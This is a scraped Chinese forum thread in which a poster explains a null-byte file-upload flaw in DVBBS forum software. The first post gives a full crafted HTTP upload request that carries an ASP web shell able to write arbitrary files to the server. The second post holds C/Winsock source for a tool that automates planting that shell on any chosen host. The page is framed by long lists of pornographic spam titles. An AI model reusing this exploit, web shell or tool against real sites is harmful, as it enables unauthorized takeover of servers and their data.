欧美激情精品在线_久久人人爽人人爽爽久久_亚洲最大激情中文字幕_久久国产精品 国产精品

 通信界 | 通信圈 | 通信家 | 下載吧 | 說吧 | 國際 | 國內 | 運營 | 市場 | 財經 | 物聯網 | 無現金 | | 專網 | 信息安全 | 5G | BigDate
 電源 | 專網 | 光通信 | 交換 | 視頻 | 接入 | 無線 | 線纜 | 測試 | IT | 自動化 | 互聯網 | 數據 | 政策 | 終端 | NGN | 視界 | 前瞻 | 知本院

通信圈〖休閑 · 娛樂〗數據編程 · 大數據建設 → 動網論壇上傳文件漏洞的原理以及攻擊的代碼實現

歡迎您提出建議和意見!管理員QQ:181502650 通信界QQ群:群①:31498574;群②:89286709 下載吧-通信書籍、通信論文、通信報告集聚地! 通信界QQ群:群③:5834261;群④:8044407

  共有5354人關注過本帖樹形打印復制鏈接

主題:動網論壇上傳文件漏洞的原理以及攻擊的代碼實現
帥哥喲,離線,有人找我嗎?
新月彎刀
   1樓 | 信息 | 搜索 | 郵箱 | 主頁 | UC


加好友 發短信 新月派彎刀
等級:通信圈管理員 帖子:2213 積分:26874 威望:10 精華:34 注冊:2004/9/1 1:25:35 		動網論壇上傳文件漏洞的原理以及攻擊的代碼實現  發帖心情 Post By:2006/10/18 12:00:33 [顯示全部帖子]

最近一段時間比較忙,沒什么時間為組織做貢獻(實在是沒實力,呵呵).剛好前一段時間聽小豬(豬蛋兒的《目前流行的BBS安全性比較》一文請參閱:http://wvw.ttian.net/forum/viewtopic.php?id=269)說動網論壇出了一個上傳任意文件的漏洞,當時沒怎么明白.但是我看到最近NB論壇上全部都在討論有關這方面的問題,就研究了一下,發現這個漏洞確實存在,而且非常嚴重,用小豬的話說是DVBBS7.0 SP2以下通殺.雖然有些人已經知道了攻擊方法,但是還是存在一些問題.下面我就動網的這個漏洞做一下講解.(不知道會不會被人罵,因為這個漏洞實在太大了). 我們先看一下動網論壇上傳文件的相關代碼: '===========無組件上傳(upload_0)==================== sub upload_0() set upload=new UpFile_Class ''建立上傳對象 upload.GetDate (int(Forum_Setting(56))*1024) '取得上傳數據,不限大小 iCount=0 if upload.err > 0 then select case upload.err case 1 Response.Write "請先選擇你要上傳的文件 [ <a href=# onclick=history.go(-1)>重新上傳</a> ]" case 2 Response.Write "圖片大小超過了限制 "&Forum_Setting(56)&"K [ <a href=# onclick=history.go(-1)>重新上傳</a> ]" end select exit sub else formPath=upload.form("filepath") ''在目錄后加(/) if right(formPath,1)<>"/" then formPath=formPath&"/" for each formName in upload.file ''列出所有上傳了的文件 set file=upload.file(formName) ''生成一個文件對象 if file.filesize<100 then response.write "請先選擇你要上傳的圖片 [ <a href=# onclick=history.go(-1)>重新上傳</a> ]" response.end end if fileExt=lcase(file.FileExt) if CheckFileExt(fileEXT)=false then response.write "文件格式不正確 [ <a href=# onclick=history.go(-1)>重新上傳</a> ]" response.end end if randomize ranNum=int(90000*rnd)+10000 filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt if file.FileSize>0 then ''如果 FileSize > 0 說明有文件數據 file.SaveToFile Server.mappath(filename) ''保存文件 ' response.write file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" 成功!<br>" response.write "<script>parent.document.forms[0].myface.value='"&FileName&"'</script>" iCount=iCount+1 end if set file=nothing next set upload=nothing session("upface")="done" Htmend iCount&" 個文件上傳結束!" end if end sub 在上面代碼中可以看到這樣一句: filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt 這里,filename是保存的文件名,它是依照上傳時間來命名的,最后擴展名是表單中提交過來的文件的擴展名.但是程序中對提交文件的類型做了限制,顯然想直接上傳ASP文件是不可行的.但是我們來看一下做為后輟的依據從哪里來的呢?我們可以在reg_upload.asp中找到這樣的代碼: <form name="form" method="post" action="upfile.asp" enctype="multipart/form-data" > <input type="hidden" name="filepath" value="uploadFace"> <input type="hidden" name="act" value="upload"> <input type="file" name="file1"> <input type="hidden" name="fname"> <input type="submit" name="Submit" value="上傳" onclick="fname.value=file1.value,parent.document.forms[0].Submit.disabled=true, parent.document.forms[0].Submit2.disabled=true;"> </form> 這樣,我們知道了,程序是提取file1表單和fname表單中的值來做判斷的.也就是說直接從頁面遞交我們的ASP文件也是行不通了,但是,如果是我們自己構造數據包的話就不一樣了.欲望之翼提出的方法就是自已構造數據包來達到欺騙的目的.將提交的file1表單和fname表單項的值改成合法的文件名稱.這樣就可以繞過文件類型的檢測了. 當然,主要的問題不在這里,如果我們只是要上傳那些代碼的話,我們完全可以直接改文件名就好了.我們的目的是要讓我們上傳的文件名改成ASP,這樣我們才可以利用.關鍵就在這一句了: formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt 這句話將一段字符串合并起來.我們能改的就是formPath這個參數.在計算機中檢測字符串的關鍵就是看是否碰到'\0'字符,如果是,則認為字符串結束了.也就是說我們在構造上傳文件保存路徑時,只要欺騙計算機,讓他認為類似"uploadface\zwell.asp"這樣的路徑參數已經結束了,這樣,后面一連串的時間字符我們都可以不要,從而達到直接將文件保存為我們定義的文件名的目的.因些,我們要做的是在構造的數據包中,將表單中的filepath改成類似uploadface\zwell.asp'\0'的字符串然后發送出去就行了. 我們先來看一下數據包的格式(論壇上好像大家用的是WSockExpert,不過我用的是IRIS,我覺得更專業一點,^_^): POST /forum/upfile.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://192.168.10.101/a.asp?a=http://uyee.com/forum/upfile.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d4a325500d2 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MyIE2; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Host: uyee.com Content-Length: 1593 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQCAQBAQT=NBDJCEFCMIICLJBJKHKMHJEF -----------------------------7d4a325500d2 Content-Disposition: form-data; name="filepath" uploadFace\zwell.asp -----------------------------7d4a325500d2 Content-Disposition: form-data; name="act" upload -----------------------------7d4a325500d2 Content-Disposition: form-data; name="file1"; filename="C:\1.gif" Content-Type: text/plain <%dim objFSO%> <%dim fdata%> <%dim objCountFile%> <%on error resume next%> <%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%> <%if Trim(request("syfdpath"))<>"" then%> <%fdata = request("cyfddata")%> <%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%> <%objCountFile.Write fdata%> <%if err =0 then%> <%response.write "<font color=red>save Success!</font>"%> <%else%> <%response.write "<font color=red>Save UnSuccess!</font>"%> <%end if%> <%err.clear%> <%end if%> <%objCountFile.Close%> <%Set objCountFile=Nothing%> <%Set objFSO = Nothing%> <%Response.write "<form action='''' method=post>"%> <%Response.Write "<input type=text name=syfdpath width=32 size=50>"%> <%Response.Write "<br>"%> <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%> <%Response.write "<br>"%> <%Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>"%> <%Response.write "<input type=submit value=save>"%> <%Response.write "</form>"%> -----------------------------7d4a325500d2 Content-Disposition: form-data; name="fname" C:\1.gif -----------------------------7d4a325500d2 Content-Disposition: form-data; name="Submit" 上傳 -----------------------------7d4a325500d2-- 上面的數據我是在WIN2003下調試的.按我前面講的,只要改幾個地方就好了 1.Content-Disposition: form-data; name="file1"; filename="C:\1.gif" 2.Content-Disposition: form-data; name="fname" C:\1.gif 3.最重要的地方:uploadFace\zwell.asp,怎么加一個空字符呢?用UltraEdit是個好方法,用16進制編輯,(因為'\0'這個字符也占一個位置,所以我們先打入一空格,然后再在UltraEdit里將對就空格符的20改成00). 至于,最前面的那一段,直接從抓包工具中提取就是了.而且隨便一個都行.但是最重要的是要注意這一句: Content-Length: 1593 很多人測試都沒成功,就因為這個值設的不對,其實這個值很好算,是從第一個"-----------------------------7d4a325500d2"開始算起,到"-----------------------------7d4a325500d2--\r\n\r\n"截止,大家看到的"\r\n"是起換行作用,占兩個字符.我看論壇上大家論壇時都是說加一個字符值就加一,不是說不對,只是還要這樣數,代碼短倒無所謂,代碼要是很長怎么辦呢?:),這里告訴大家一個簡單的方法:打開記事本,將算長度的代碼復制到記事本,保存,然后看屬性就一目了然了,一個字符都不會錯.只是有一點必須注意,必須將最后的那幾個換行也復制進來.很多人就是因為沒有復制換行才失敗的.


由于家園論壇數據量過于龐大,無法進行帖子逐個修改,故給所有用戶每人增加5000元電通幣用于下載用,若電通幣用完了,可以向管理員申請,版主會及時給您增加金錢,也希望大家理解,多多發貼跟帖,共同營造良好的溝通氛圍。
通信界QQ群:群①:31498574;群②:89286709  回到頂部
帥哥喲,離線,有人找我嗎?
新月彎刀
   2樓 | 信息 | 搜索 | 郵箱 | 主頁 | UC


加好友 發短信 新月派彎刀
等級:通信圈管理員 帖子:2213 積分:26874 威望:10 精華:34 注冊:2004/9/1 1:25:35 		  發帖心情 Post By:2006/10/18 12:00:52 [顯示全部帖子]

寫了這么多,我們也看到,每一個這樣改太不方便,做了工具是必須的了,呵呵,具體不多說了,部分代碼如下: #include <winsock2.h> #include <stdio.h> #include "Resource.h" #pragma comment(lib,"ws2_32.lib") HINSTANCE g_hInst; HWND g_hWnd; HWND m_up; HWND m_host; HWND m_webpath; HWND m_path; HWND m_filename; HWND m_upload; DWORD m_theadid; BYTE sendbuf[10000]; char host[80]; //主機地址 char bbspath[50]; //論壇地址 char uppath[20]; //上傳目錄 char upfilename[50]; //上傳文件名 char upfiledata[8000]; //上傳文件內容 int sendsize; //總傳送數據大小 int realsndsize = 0; //傳送頁面文件的大小 char snddata[8000]; char mm[1000]= "<%dim objFSO%>\r\n" "<%dim fdata%>\r\n" "<%dim objCountFile%>\r\n" "<%on error resume next%>\r\n" "<%Set objFSO = Server.CreateObject(\"Scripting.FileSystemObject\")%>\r\n" "<%if Trim(request(\"syfdpath\"))<>\"\" then%>\r\n" "<%fdata = request(\"cyfddata\")%>\r\n" "<%Set objCountFile=objFSO.CreateTextFile(request(\"syfdpath\"),True)%>\r\n" "<%objCountFile.Write fdata%>\r\n" "<%if err =0 then%>\r\n" "<%response.write \"<font color=red>save Success!</font>\"%>\r\n" "<%else%>" "<%response.write \"<font color=red>Save UnSuccess!</font>\"%>\r\n" "<%end if%>\r\n" "<%err.clear%>\r\n" "<%end if%>" "<%objCountFile.Close%>\r\n" "<%Set objCountFile=Nothing%>\r\n" "<%Set objFSO = Nothing%>" "<%Response.write \"<form action=\'\' method=post>\"%>\r\n" "<%Response.Write \"<input type=text name=syfdpath width=32 size=50>\"%>\r\n" "<%Response.Write \"<br>\"%>\r\n" "<%=server.mappath(Request.ServerVariables(\"SCRIPT_NAME\"))%>\r\n" "<%Response.write \"<br>\"%>\r\n" "<%Response.write \"<textarea name=cyfddata cols=80 rows=10 width=32></textarea>\"%>\r\n" "<%Response.write \"<input type=submit value=save>\"%>\r\n" "<%Response.write \"</form>\"%>\r\n"; //獲得控件文本 char *gettext(HWND chwnd) { char tmpbuf[10000]; SendMessage(chwnd, WM_GETTEXT, (WPARAM)sizeof(tmpbuf), (LPARAM)tmpbuf); return tmpbuf; } //設置控件文本 void settext(HWND chwnd,char *text) { SendMessage(chwnd, WM_SETTEXT, (WPARAM)(0), (LPARAM)text); } char *itos(int data) { char tmp[10]; sprintf(tmp, "%d", data); return tmp; } //上傳線程 DWORD WINAPI uploadthread(LPVOID param) { SOCKET s; sockaddr_in sin; struct hostent * hp; unsigned int addr; s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); ZeroMemory((void *)&sin, sizeof(sin)); hp = gethostbyname(gettext(m_host)); if (!hp) addr = inet_addr(gettext(m_host)); if ((!hp) && (addr == INADDR_NONE) ) { MessageBox(g_hWnd, "Unable to resolve host", "sendbuf", MB_OK); return 0; } if (hp != NULL) memcpy(&(sin.sin_addr),hp->h_addr,hp->h_length); else sin.sin_addr.s_addr = addr; sin.sin_port = htons(80); sin.sin_family = AF_INET; strcpy(host, gettext(m_host)); strcpy(bbspath, gettext(m_webpath)); strcpy(upfiledata, gettext(m_upload)); strcpy(uppath, gettext(m_path)); strcpy(upfilename, gettext(m_filename)); realsndsize = 578 + strlen(uppath) + strlen(upfilename) + strlen(upfiledata) + 1; sprintf((char *)sendbuf, "POST %s/upfile.asp HTTP/1.1\r\n" "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n" "Referer: http://192.168.10.101/a.asp?a=http://uyee.com/forum/upfile.asp\r\n" "Accept-Language: zh-cn\r\n" "Content-Type: multipart/form-data; boundary=---------------------------7d4a325500d2\r\n" "Accept-Encoding: gzip, deflate\r\n" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MyIE2; .NET CLR 1.1.4322; .NET CLR 1.0.3705)\r\n" "Host: %s\r\n" "Content-Length: %d\r\n" "Connection: Keep-Alive\r\n" "Cache-Control: no-cache\r\n" "Cookie: iscookies=0; BoardList=BoardID=Show; ASPSESSIONIDQCAQBAQT=NBDJCEFCMIICLJBJKHKMHJEF\r\n\r\n" "-----------------------------7d4a325500d2\r\n" "Content-Disposition: form-data; name=\"filepath\"\r\n\r\n" "%s\\%s", bbspath, host, realsndsize, uppath, upfilename); sendsize = strlen((char *)sendbuf); sendbuf[sendsize] = '\0'; sprintf(snddata, "\r\n" "-----------------------------7d4a325500d2\r\n" "Content-Disposition: form-data; name=\"act\"\r\n\r\n" "upload\r\n" "-----------------------------7d4a325500d2\r\n" "Content-Disposition: form-data; name=\"file1\"; filename=\"C:\\1.gif\"\r\n" "Content-Type: text/plain\r\n\r\n" "%s\r\n" "-----------------------------7d4a325500d2\r\n" "Content-Disposition: form-data; name=\"fname\"\r\n\r\n" "C:\\1.gif\r\n" "-----------------------------7d4a325500d2\r\n" "Content-Disposition: form-data; name=\"Submit\"\r\n\r\n" "上傳\r\n" "-----------------------------7d4a325500d2--\r\n\r\n", upfiledata); strcat((char *)&sendbuf[sendsize+1], snddata); sendsize += strlen(snddata); sendsize += 1; if(SOCKET_ERROR == connect(s, (struct sockaddr *)&sin, sizeof(sin))) { MessageBox(g_hWnd, "連接出錯!", "出錯提示:", MB_OK|MB_IConERROR); return 0; } int sendsz = send(s, (char *)sendbuf, sendsize, 0); if(sendsz <= 0) MessageBox(g_hWnd, "發送數據失敗", itos(WSAGetLastError()), MB_OK); char recvbuf[10000]; recv(s, (char*)recvbuf, 10000, 0); settext(m_upload, recvbuf); closesocket(s); return 0; } void WINAPI On_Command(WPARAM wParam) { switch (LOWORD(wParam)) { case ID_UP: CreateThread(NULL, 0, uploadthread, NULL, NULL, &m_theadid); break; case IDCANCEL: SendMessage(g_hWnd, WM_CLOSE, (WPARAM)(NULL), LPARAM(NULL)); break; } } static BOOL CALLBACK MainDlgProc(HWND hWndDlg, UINT msg, WPARAM wParam, LPARAM lParam) { switch (msg) { case WM_INITDIALOG: g_hWnd = hWndDlg; m_up = GetDlgItem(g_hWnd, ID_UP); m_host = GetDlgItem(g_hWnd, IDC_EDIT1); m_webpath = GetDlgItem(g_hWnd, IDC_EDIT2); m_path = GetDlgItem(g_hWnd, IDC_EDIT3); m_upload = GetDlgItem(g_hWnd, IDC_EDIT4); m_filename = GetDlgItem(g_hWnd, IDC_EDIT5); settext(m_host, "192.168.10.101"); settext(m_webpath, "/"); settext(m_path, "uploadface"); settext(m_filename, "zwell.asp"); settext(m_upload, mm); return TRUE; case WM_COMMAND: On_Command(wParam); break; case WM_SIZE: break; case WM_CLOSE: EndDialog(g_hWnd,0); break; } return FALSE; } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { WSADATA wsaData; g_hInst=hInstance; if(WSAStartup(MAKEWORD(1, 1), &wsaData)) { MessageBox(NULL,"無法初始化 Winsock DLL\t","錯誤",MB_OK|MB_ICONSTOP); return 0; } DialogBox(g_hInst, MAKEINTRESOURCE(IDD_DIALOG1), NULL, (DLGPROC) MainDlgProc); WSACleanup(); return 1; }


由于家園論壇數據量過于龐大,無法進行帖子逐個修改,故給所有用戶每人增加5000元電通幣用于下載用,若電通幣用完了,可以向管理員申請,版主會及時給您增加金錢,也希望大家理解,多多發貼跟帖,共同營造良好的溝通氛圍。
歡迎您提出建議和意見!管理員QQ:181502650  回到頂部
欧美激情精品在线_久久人人爽人人爽爽久久_亚洲最大激情中文字幕_久久国产精品 国产精品
国产精品看片资源| 亚洲精品中文综合第一页| 久久精品小视频| 日本一区视频在线观看| www精品久久| 欧美xxxx18国产| 美女黄毛**国产精品啪啪| 俺去了亚洲欧美日韩| 日韩欧美精品一区二区三区经典| 91精品久久久久久蜜桃| 中文字幕av日韩精品| 国产色一区二区三区| 国产精品久久久久91| 含羞草久久爱69一区| 国产精品日韩欧美综合| 欧美一级大胆视频| 精品国产一区二区三区久久狼黑人| 色噜噜一区二区| 久久久免费观看视频| 亚洲精品欧美日韩| 国产精品99久久久久久白浆小说| 亚洲欧美综合一区| av在线免费观看国产| 亚洲欧洲在线一区| 国产精品99久久久久久大便| 色狠狠久久av五月综合| 久久精品国产理论片免费| 日本午夜精品一区二区| 久久久久久久av| 免费在线观看日韩视频| 久久亚洲国产精品成人av秋霞| 国产一区二区视频免费在线观看| 国产精品久久电影观看| 国产麻豆电影在线观看| 亚洲精品免费一区二区三区| 国产福利视频在线播放| 欧美专区第一页| 国产精品精品软件视频| 国产精品亚洲美女av网站| 亚洲免费在线精品一区| 久激情内射婷内射蜜桃| 激情视频一区二区| 九九视频直播综合网| 国产精品一区二区久久久| 亚洲成人网上| 日韩中文字幕网| 国产一区欧美二区三区| 亚洲综合日韩中文字幕v在线| www.av中文字幕| 日韩av不卡播放| 久久手机免费视频| 国产视频999| 亚洲色欲综合一区二区三区| 久久99国产精品| 国产中文字幕91| 亚洲国产日韩美| 精品国产一区二区三区久久狼黑人 | 日韩精品一区二区三区丰满| 日韩亚洲第一页| 国产日本一区二区三区| 日韩中文一区| 久色乳综合思思在线视频| 91av成人在线| 麻豆中文字幕在线观看| 视频在线精品一区| 久久综合免费视频| 国产成人精品999| 国产欧美日韩精品丝袜高跟鞋| 日本一区二区高清视频| 精品久久久久久中文字幕动漫| 久久综合九色综合网站| 国内精品国产三级国产在线专 | 久久黄色片视频| 国产欧美va欧美va香蕉在| 日本在线观看不卡| 美女久久久久久久| 北条麻妃久久精品| 91久久久久久久久久久久久| 欧美二区在线视频| 欧美一区二区激情| 欧美精品在线免费播放| 日韩在线精品一区| 91精品国产99| 国产三级中文字幕| 欧美日韩视频免费| 亚洲v日韩v欧美v综合| 国产精品欧美风情| 久久视频这里有精品| 国产欧美日韩精品丝袜高跟鞋| 欧美一区免费视频| 日本免费成人网| 亚洲国产精品一区二区第四页av| 国产精品久久久久久av| 日韩在线中文视频| 国产成人综合一区| 91九色在线观看视频| 国产欧美日韩一区二区三区| 欧美亚洲国产日韩2020| 日本视频精品一区| 无码少妇一区二区三区芒果| 一区二区免费在线观看| 欧美成人精品三级在线观看| 俺也去精品视频在线观看| 国产精品12| 91国自产精品中文字幕亚洲| 国产精品亚洲美女av网站| 国产又粗又爽又黄的视频| 欧美重口乱码一区二区| 日韩欧美精品在线不卡| 色噜噜狠狠色综合网| 亚洲欧美在线网| 亚洲最大成人在线| 中文字幕第一页亚洲| 欧美激情视频在线| 色综合久久中文字幕综合网小说| 国产精品天天av精麻传媒| 91国产高清在线| 91免费在线观看网站| 波多野结衣综合网| 国产毛片视频网站| 国产伦一区二区三区色一情| 国产美女主播在线播放| 国产午夜福利在线播放| 国产欧美一区二区视频| 国产欧美日韩专区发布| 国产精品夜夜夜爽张柏芝| www国产免费| 97精品在线观看| 国产精欧美一区二区三区| 久久天天狠狠| 丝袜美腿精品国产二区| 国产成人免费观看| 精品国内产的精品视频在线观看| 色视频www在线播放国产成人| 色偷偷9999www| 久久精品亚洲热| 欧美精品生活片| 亚洲伊人成综合成人网| 欧美一区二区三区……| 欧美性视频精品| 国产一二三区在线播放| www国产亚洲精品| 久久人妻无码一区二区| 日韩亚洲第一页| 国产精品对白刺激| 中文字幕一区二区中文字幕| 欧美一级片免费播放| 日本视频一区二区在线观看| 日韩免费观看高清| 国产自产在线视频| 波多野结衣久草一区| 久久精品人人做人人爽电影| 国产精品欧美一区二区| 一区二区国产日产| 日韩视频第二页| 国产一区免费视频| 91福利视频网| 国产精品久久久久久一区二区 | 激情久久av| 99久久国产宗和精品1上映 | 国产精品第三页| 亚洲美女网站18| 青春草在线视频免费观看| 免费久久久一本精品久久区| 91九色对白| 国产精品激情av电影在线观看| 亚洲人精品午夜射精日韩| 人妻av无码专区| 国产免费黄色一级片| 国产不卡一区二区在线观看| 国产精品久久久久av福利动漫| 欧美精品久久久久a| 日本视频久久久| 国产三级中文字幕| 久久国产精品久久| 久久久久久国产| 欧美亚洲视频一区| 99热在线这里只有精品| www.亚洲成人| 亚洲综合在线播放| 黄页网站在线观看视频| 久久人人97超碰精品888| 欧美精品在线免费| 欧美综合激情网| 99久久国产宗和精品1上映| 国产精品美女在线观看| 亚洲精品欧美精品| 精品亚洲第一| 日韩中文字幕免费看| 日韩一区免费观看| 国产原创中文在线观看| 久久99热只有频精品91密拍| 亚洲综合av一区| 精品网站在线看| 精品国产一区二区三区久久狼5月| 亚洲三级一区| 国产精品在线看| 国产精品高潮粉嫩av| 青草青草久热精品视频在线观看 | 欧美理论片在线观看|